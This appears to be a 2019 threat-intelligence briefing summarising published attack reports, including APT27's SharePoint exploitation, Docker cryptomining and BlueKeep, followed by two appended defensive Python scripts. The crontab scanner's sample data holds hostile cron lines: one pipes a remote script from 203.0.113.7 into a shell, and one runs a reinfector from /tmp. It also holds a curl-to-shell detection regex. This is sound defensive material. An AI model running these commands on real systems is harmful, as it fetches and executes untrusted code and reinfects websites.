June 4, 2019 - Anomali Threat Research

Weekly Threat Briefing: Emissary Panda Attacks Middle East Government Sharepoint Servers

<p>The intelligence in this week's iteration discusses the following threats: <b>APT</b>, <b>Credential theft</b>, <b>Cryptomining</b>, <b>Data theft</b>, <b>Phishing</b>, <b>Payment card theft</b>, <b>Targeted attacks</b>, and <b>Vulnerabilities</b>. The IOCs related to these stories are attached to the Community Threat Briefing and can be used to check your logs for potential malicious activity.</p><h2>Trending Threats</h2><p><a href="https://www.bleepingcomputer.com/news/security/improper-app-check-revives-the-synthetic-clicks-issue-in-macos-mojave/" target="_blank"><b>Improper App Check Revives the Synthetic Clicks Issue in macOS Mojave</b></a> (<i>June 3, 2019</i>)<br/> macOS researcher Patrick Wardle has identified an unpatched flaw in the app verification process on macOS Mojave. The vulnerability allows legacy apps to load and execute unverified code: a trusted application can be altered by code executing on the machine without the user's knowledge, enabling malicious activity. Synthetic (automated) clicks then allow the altered app to interact with security prompts without user involvement. This is the second zero-day issue reported in two weeks that affects macOS Mojave; the other, a flaw that allows Gatekeeper to be bypassed with unsigned code on a network share, was discovered by Filippo Cavallarin.<br/> <a href="https://forum.anomali.com/t/improper-app-check-revives-the-synthetic-clicks-issue-in-macos-mojave/3849" target="_blank">Click here for Anomali recommendation</a></p><p><a href="https://blog.trendmicro.com/trendlabs-security-intelligence/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims/" target="_blank"><b>Infected Cryptocurrency-mining Containers Target Docker Hosts With Exposed APIs, Use Shodan to Find Additional Victims</b></a> (<i>May 30, 2019</i>)<br/> Trend Micro researchers have identified Docker containers with exposed APIs that are being used to host threats. 
A script uses the internet-scanning tool Shodan to search for hosts with exposed Docker APIs; once one is found, Docker commands are used to create a container for the malicious code. A coin-mining binary for the Monero cryptocurrency is then run, together with scripts that look for new hosts to infect. Each host is added to an IP list that the Command and Control (C2) servers iterate through when looking for a new host, looping back to the beginning to start the process again.<br/> <a href="https://forum.anomali.com/t/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims/3850" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947201">[MITRE ATT&amp;CK] Scripting (T1064)</a> | <a href="https://ui.threatstream.com/ttp/947205">[MITRE ATT&amp;CK] User Execution (T1204)</a></p><p><a href="https://www.zdnet.com/article/checkers-restaurant-chain-discloses-card-breach/" target="_blank"><b>Checkers Restaurant Chain Discloses Card Breach</b></a> (<i>May 30, 2019</i>)<br/> The US-based drive-thru restaurant chain Checkers and Rally's disclosed on May 29 that an attack had impacted over 100 locations. The company said its payment-processing systems were breached with malware designed to steal information from the magnetic stripe of payment cards. The information includes cardholder name, card number, card verification code, and expiration date. Most restaurants were cleaned in April 2019, when the malware was discovered; however, the infections date back to September 2016, with most occurring in 2018 and 2019. 
Checkers is working with federal law enforcement regarding the attack.<br/> <a href="https://forum.anomali.com/t/checkers-restaurant-chain-discloses-card-breach/3851" target="_blank">Click here for Anomali recommendation</a></p><p><a href="https://www.intezer.com/blog-hiddenwasp-malware-targeting-linux-systems/" target="_blank"><b>HiddenWasp Malware Stings Targeted Linux Systems</b></a> (<i>May 29, 2019</i>)<br/> A new malware named "HiddenWasp" has been found targeting Linux systems, according to Intezer researchers. The malware is a trojan used for targeted remote control of a system and employs advanced evasion techniques. Analysis of the infected systems suggests that the targets may already have been under the control of the attackers, or of another group working alongside this threat group. Using a deployment script, a trojan and a rootkit, the threat actors behind this malware gain remote access to a target system and establish persistence. Because the deployment script also creates a new user account (named "sftp"), the actors retain access to the system even after HiddenWasp is removed.<br/> <a href="https://forum.anomali.com/t/hiddenwasp-malware-stings-targeted-linux-systems/3852" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947201">[MITRE ATT&amp;CK] Scripting (T1064)</a> | <a href="https://ui.threatstream.com/ttp/947273">[MITRE ATT&amp;CK] Create Account (T1136)</a> | <a href="https://ui.threatstream.com/ttp/947092">[MITRE ATT&amp;CK] Rootkit (T1014)</a> | <a href="https://ui.threatstream.com/ttp/947173">[MITRE ATT&amp;CK] Hooking (T1179)</a> | <a href="https://ui.threatstream.com/ttp/1259968">[MITRE PRE-ATT&amp;CK] Host-based hiding techniques (PRE-T1091)</a> | <a href="https://ui.threatstream.com/ttp/947210">[MITRE ATT&amp;CK] Exfiltration Over Command and Control Channel (T1041)</a></p><p><a 
href="https://www.newsbtc.com/2019/05/29/crypto-scam-alert-youtube-videos-promoting-bitcoin-generator-really-pushing-malware/" target="_blank"><b>Crypto Scam Alert: Youtube Videos Promoting "Bitcoin Generator" Really Pushing Malware</b></a> (<i>May 29, 2019</i>)<br/> A new cryptomining campaign, discovered by a researcher known as "Frost," uses YouTube videos to persuade users to download a "Bitcoin generator." Once the user clicks the download link, they are directed to download and run a Setup.exe file, which infects their machine with the "Qulab" trojan. Qulab attempts to steal data from the user's browser, including history, cookies, social media credentials and other saved credentials, along with .txt, .mafiles and .wallet files. Qulab also steals clipboard data, which can contain cryptocurrency addresses; the attacker can then replace the victim's public key (address) with their own, so that the victim's cryptocurrency is sent to the attacker's wallet instead.<br/> <a href="https://forum.anomali.com/t/crypto-scam-alert-youtube-videos-promoting-bitcoin-generator-really-pushing-malware/3853" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947205">[MITRE ATT&amp;CK] User Execution (T1204)</a></p><p><a href="https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/" target="_blank"><b>The Nansh0u Campaign - Hackers Arsenal Grows Stronger</b></a> (<i>May 29, 2019</i>)<br/> Guardicore Labs has been monitoring a China-based campaign that seeks to infect MS-SQL and PHPMyAdmin servers in order to drop a cryptominer. The attacks appear to have begun around February, with 20 payload versions used to date. Targets include the IT, healthcare, media and telecommunications sectors, with over 50,000 servers infected. The MS-SQL attacks comprised three components: a port scanner, an MS-SQL brute-force tool, and a remote code executor. 
The campaign uses tooling of a kind previously seen in nation-state attacks, which is becoming increasingly accessible to non-state actors.<br/> <a href="https://forum.anomali.com/t/the-nansh0u-campaign-hackers-arsenal-grows-stronger/3854" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/1259903">[MITRE PRE-ATT&amp;CK] Authentication attempt (PRE-T1158)</a> | <a href="https://ui.threatstream.com/ttp/947201">[MITRE ATT&amp;CK] Scripting (T1064)</a> | <a href="https://ui.threatstream.com/ttp/947227">[MITRE ATT&amp;CK] Brute Force (T1110)</a> | <a href="https://ui.threatstream.com/ttp/947233">[MITRE ATT&amp;CK] Exploitation for Privilege Escalation (T1068)</a> | <a href="https://ui.threatstream.com/ttp/947235">[MITRE ATT&amp;CK] Obfuscated Files or Information (T1027)</a></p><p><a href="https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/" target="_blank"><b>Emissary Panda Attacks Middle East Government Sharepoint Servers</b></a> (<i>May 28, 2019</i>)<br/> Unit 42 researchers have observed attacks by Emissary Panda (APT27) targeting two Middle Eastern government organizations. The attacks took place on April 1 and April 16, 2019, with the group exploiting a remote code execution vulnerability in Microsoft SharePoint, CVE-2019-0604. This vulnerability allowed the actors to remotely upload three webshells, through which they deployed backdoors, vulnerability scanners and credential-theft tools. Although Microsoft had patched the vulnerability, the attackers were able to abuse it before the victims' systems had been updated. Once Emissary Panda had gained access through the SharePoint vulnerability, they exploited another vulnerability, CVE-2017-0144 (EternalBlue), to pivot to other systems. 
The affected governments have not been named.<br/> <a href="https://forum.anomali.com/t/emissary-panda-attacks-middle-east-government-sharepoint-servers/3855" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947247">[MITRE ATT&amp;CK] Web Shell (T1100)</a> | <a href="https://ui.threatstream.com/ttp/947201">[MITRE ATT&amp;CK] Scripting (T1064)</a> | <a href="https://ui.threatstream.com/ttp/1260045">[MITRE PRE-ATT&amp;CK] Upload, install, and configure software/tools (PRE-T1139)</a> | <a href="https://ui.threatstream.com/ttp/947232">[MITRE ATT&amp;CK] DLL Side-Loading (T1073)</a></p><p><a href="https://www.bleepingcomputer.com/news/security/duckduckgo-android-browser-vulnerable-to-url-spoofing-attacks/" target="_blank"><b>DuckDuckGo Android Browser Vulnerable to URL Spoofing Attacks</b></a> (<i>May 28, 2019</i>)<br/> Security researcher Dhiraj Mishra has identified a flaw in the Android mobile browser version of the "DuckDuckGo" search engine. The vulnerability, registered as "CVE-2019-12329," can allow threat actors to spoof the address bar. By controlling what the address bar displays, attackers can trick users into believing they are on a trusted website while they are actually on a malicious one, such as a phishing site or a site hosting malware. These attacks are particularly dangerous because they are much more difficult for users to detect.<br/> <a href="https://forum.anomali.com/t/duckduckgo-android-browser-vulnerable-to-url-spoofing-attacks/3856" target="_blank">Click here for Anomali recommendation</a></p><p><a href="https://www.bleepingcomputer.com/news/security/unpatched-flaw-affects-all-docker-versions-exploits-ready/" target="_blank"><b>Contain Yourself, Docker: Race-condition Bug Puts Host Machines at Risk... 
Sometimes, Ish</b></a> (<i>May 28, 2019</i>)<br/> A vulnerability affecting all versions of Docker, a widely used platform for deploying applications, has been discovered by Aleksa Sarai. It can potentially be exploited to read and write files on the host machine, bypass container security protections and execute code. Exploiting the vulnerability allows a threat actor to alter the host file system while a host administrator is copying data into or out of a Docker container. Using a symlink (a file that contains a reference to another file or directory), a path inside the container can be swapped between the moment Docker resolves it and the moment it is used (the race condition), so that the copy operation reads from or writes to the host file system instead. The research suggests that a proper fix in Docker is very difficult, so less ideal mitigations, such as pausing containers during file operations, have been proposed instead.<br/> <a href="https://forum.anomali.com/t/contain-yourself-docker-race-condition-bug-puts-host-machines-at-risk-sometimes-ish/3857" target="_blank">Click here for Anomali recommendation</a></p><p><a href="https://www.fortinet.com/blog/threat-research/rocke-variant-ready-to-box-mining-challengers.html" target="_blank"><b>New Rocke Variant Ready to Box Any Mining Challengers</b></a> (<i>May 28, 2019</i>)<br/> FortiGuard Labs researchers have observed that "Rocke," a threat group specializing in cryptomining, has added new features to its cryptomining malware. The malware, hosted on Pastebin, can be installed on systems through a number of means, including automated internet vulnerability scanning, brute-forcing of service logins and exploitation of vulnerabilities. Using hooking libraries, the malware hides itself, making it more difficult for users to detect and remove and so allowing it to remain on the system longer. 
Recently, the threat actors have been targeting systems running Jenkins by attempting to exploit the vulnerabilities CVE-2018-1000861 and CVE-2019-1003000.<br/> <a href="https://forum.anomali.com/t/new-rocke-variant-ready-to-box-any-mining-challengers/3858" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947201">[MITRE ATT&amp;CK] Scripting (T1064)</a> | <a href="https://ui.threatstream.com/ttp/85773">Cron Job/Scheduled Tasks</a> | <a href="https://ui.threatstream.com/ttp/947240">[MITRE ATT&amp;CK] Data Compressed (T1002)</a> | <a href="https://ui.threatstream.com/ttp/947148">[MITRE ATT&amp;CK] New Service (T1050)</a> | <a href="https://ui.threatstream.com/ttp/947173">[MITRE ATT&amp;CK] Hooking (T1179)</a> | <a href="https://ui.threatstream.com/ttp/947227">[MITRE ATT&amp;CK] Brute Force (T1110)</a> | <a href="https://ui.threatstream.com/ttp/947190">[MITRE ATT&amp;CK] Connection Proxy (T1090)</a></p><p><a href="https://www.bleepingcomputer.com/news/security/phishing-emails-pretend-to-be-office-365-file-deletion-alerts/" target="_blank"><b>Phishing Email Pretends to be Office 365 'File Deletion' Alerts</b></a> (<i>May 28, 2019</i>)<br/> A new phishing campaign has been launched that pretends to be from Microsoft Office 365. The actors behind this campaign distribute emails claiming that an unusual number of files have been deleted from the recipient's account, presented as a "medium-severity" alert. 
A link titled "View Alert Details" takes the user to a fake Microsoft login page. Credentials entered into the site were observed being sent to an Azure website controlled by the actors, who may save them for future malicious use or offer them for sale on underground forums.<br/> <a href="https://forum.anomali.com/t/phishing-email-pretends-to-be-office-365-file-deletion-alerts/3859" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947205">[MITRE ATT&amp;CK] User Execution (T1204)</a> | <a href="https://ui.threatstream.com/ttp/947106">[MITRE ATT&amp;CK] Spearphishing Link (T1192)</a></p><p><a href="https://thehackernews.com/2019/05/bluekeep-rdp-vulnerability.html" target="_blank"><b>Nearly One Million Still Vulnerable to "Wormable" BlueKeep RDP Flaw</b></a> (<i>May 28, 2019</i>)<br/> Two weeks after Microsoft released a security patch for a wormable remote code execution vulnerability, registered as "CVE-2019-0708," nearly one million systems are still unpatched. The vulnerability, named "BlueKeep," could allow a remote attacker to gain access to a target computer by sending requests to the Remote Desktop Service via the Remote Desktop Protocol (RDP), with the potential for an attack on the scale of the global ransomware campaigns WannaCry and NotPetya. 
Microsoft released a patch for the vulnerability during its May 2019 Patch Tuesday; however, a scan performed by Robert Graham revealed that almost one million systems have not yet deployed it.<br/> <a href="https://forum.anomali.com/t/nearly-one-million-still-vulnerable-to-wormable-bluekeep-rdp-flaw/3860" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947156">[MITRE ATT&amp;CK] Remote Desktop Protocol (T1076)</a></p><p><a href="https://blog.sucuri.net/2019/05/return-to-the-city-of-cron-malware-infections-on-joomla-and-wordpress.html" target="_blank"><b>Return of the City of Cron Malware Infections on Joomla and WordPress</b></a> (<i>May 27, 2019</i>)<br/> A persistent malware infection has been found in a shared hosting environment by Sucuri. The malware detects whether a website is Joomla or WordPress from its directory structure and uses that to decide which method to use to infect the files. Through a backdoor cron job, the malware is able to reinfect files even after they have been cleaned. Its files are stored in the /tmp directory, which is rarely scanned, making the malicious files harder to detect.<br/> <a href="https://forum.anomali.com/t/return-of-the-city-of-cron-malware-infections-on-joomla-and-wordpress/3861" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/85773">Cron Job/Scheduled Tasks</a></p>
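The Trend Micro item above describes hosts found via Shodan with the Docker API exposed. As an added example (not code from the Trend Micro report or from Docker), this Python script audits a host's own daemon.json and dockerd flags for a network-reachable API without TLS client verification; both daemon.json samples are constructed.

```python
import json
from urllib.parse import urlsplit

# Constructed daemon.json samples (not from the Trend Micro report): the first is the
# exposed configuration the campaign looks for, the second the corrected one.
EXPOSED_DAEMON_JSON = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'
HARDENED_DAEMON_JSON = """{
  "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
  "tlsverify": true,
  "tlscacert": "/etc/docker/ca.pem",
  "tlscert": "/etc/docker/server-cert.pem",
  "tlskey": "/etc/docker/server-key.pem"
}"""
LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def collect_listeners(daemon_json_text, dockerd_args=""):
    """Gather listen addresses from daemon.json "hosts" and from -H/--host flags on
    the dockerd command line, plus whether TLS client verification is enabled."""
    cfg = json.loads(daemon_json_text) if daemon_json_text.strip() else {}
    hosts = list(cfg.get("hosts", []))
    tls_verify = bool(cfg.get("tlsverify", False))
    args = dockerd_args.split()
    for i, arg in enumerate(args):
        if arg in ("-H", "--host") and i + 1 < len(args):
            hosts.append(args[i + 1])
        elif arg.startswith(("-H=", "--host=")):
            hosts.append(arg.split("=", 1)[1])
        elif arg in ("--tlsverify", "--tlsverify=true"):
            tls_verify = True
    return hosts, tls_verify


def audit_docker_api(daemon_json_text, dockerd_args=""):
    """One finding per network-reachable API listener: "high" when it is plain TCP
    with no client verification (anyone reaching the port can start containers),
    "info" when TLS-verified but still worth restricting with a firewall."""
    findings = []
    hosts, tls_verify = collect_listeners(daemon_json_text, dockerd_args)
    for host in hosts:
        url = urlsplit(host)
        if url.scheme != "tcp":
            continue  # unix:// and fd:// sockets are not reachable over the network
        bind = url.hostname or "0.0.0.0"  # a bare tcp:// binds every interface
        if bind in LOOPBACK:
            continue
        port = url.port or (2376 if tls_verify else 2375)  # dockerd's defaults
        findings.append({
            "listener": host,
            "severity": "info" if tls_verify else "high",
            "detail": f"Docker API on {bind}:{port} " + (
                "with TLS client verification" if tls_verify
                else "without authentication, reachable by any client that can connect"),
        })
    return findings
```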
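The Sucuri item above describes a cron job that keeps reinfecting Joomla and WordPress files from the rarely scanned /tmp directory. As an added example (not code from Sucuri's write-up), this Python script scans a crontab for that pattern; the sample crontab, including the 203.0.113.7 address, is constructed.

```python
import re

# Constructed sample crontab (not from the Sucuri write-up); the last three jobs mimic
# the reinfection pattern, staged under a rarely scanned temp directory.
SAMPLE_CRONTAB = """\
PATH=/usr/local/bin:/usr/bin:/bin
# legitimate site maintenance
0 3 * * * /usr/bin/certbot renew --quiet
*/15 * * * * php /var/www/site/wp-cron.php >/dev/null 2>&1
* * * * * /tmp/.x/php /tmp/.x/reinfect.php >/dev/null 2>&1
@hourly curl -s http://203.0.113.7/u.sh | sh
*/5 * * * * cp /var/tmp/.cache/index.php /var/www/site/administrator/index.php
"""
STAGING_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
CMS_MARKERS = ("wp-includes", "wp-content", "wp-config.php",  # WordPress core paths
               "/administrator/", "/components/", "configuration.php")  # Joomla
REMOTE_FETCH_RE = re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba)?sh\b")


def parse_cron_line(line):
    """Return (schedule, command) for a job entry, or None for blank lines,
    comments and variable assignments such as PATH=..."""
    line = line.strip()
    if not line or line.startswith("#") or re.match(r"^\w+=", line):
        return None
    if line.startswith("@"):  # @reboot, @hourly, ...
        parts = line.split(None, 1)
        return (parts[0], parts[1]) if len(parts) == 2 else None
    parts = line.split(None, 5)  # five time fields, then the command
    if len(parts) < 6:
        return None
    return " ".join(parts[:5]), parts[5]


def audit_crontab(crontab_text):
    """Return a list of {schedule, command, reasons} for jobs worth inspecting."""
    findings = []
    for raw in crontab_text.splitlines():
        parsed = parse_cron_line(raw)
        if parsed is None:
            continue
        schedule, command = parsed
        reasons = []
        staged = any(d in command for d in STAGING_DIRS)
        if staged:
            reasons.append("references a temp/staging directory")
        if REMOTE_FETCH_RE.search(command):
            reasons.append("downloads remote content and pipes it into a shell")
        if staged and any(m in command for m in CMS_MARKERS):
            reasons.append("writes staged content into Joomla/WordPress paths")
        if reasons and schedule == "* * * * *":
            reasons.append("runs every minute")  # a reinfector keeps re-applying itself
        if reasons:
            findings.append({"schedule": schedule, "command": command, "reasons": reasons})
    return findings
```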
